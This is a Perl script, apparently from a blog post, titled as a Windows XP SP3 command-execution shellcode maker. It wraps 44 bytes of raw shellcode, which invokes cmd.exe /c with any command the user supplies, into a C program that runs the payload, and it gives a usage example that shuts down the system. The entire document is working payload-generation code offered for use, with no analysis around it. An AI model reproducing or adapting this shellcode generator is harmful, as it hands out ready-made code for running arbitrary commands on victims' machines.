win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
#!/usr/bin/perl
system("cls");
sub logo(){
print q'
Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD
';
}
logo();
###
# Title : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
# Author : Tringle2011
# platform : win32
# Impact : Command Execution / Shellcode maker
# Tested on : Windows XP sp3
$ARGC=@ARGV;
if ($ARGC!=1) {
print "\n [!] Usage: perl $0 [Command] \n\n";
die " [*] f.ex: perl $0 shutdown -s -t 18 \n";
}
my $CMD = shift;
my $header = q'
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(){
unsigned char shellcode[]=
';
my $sh = q'
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20'.$CMD.'"';
my $end = q'
printf("Size = %d bytes\n", strlen(shellcode));
((void (*)())shellcode)();
return 0;
}
';
print $header.$sh.$end;
No comments:
Post a Comment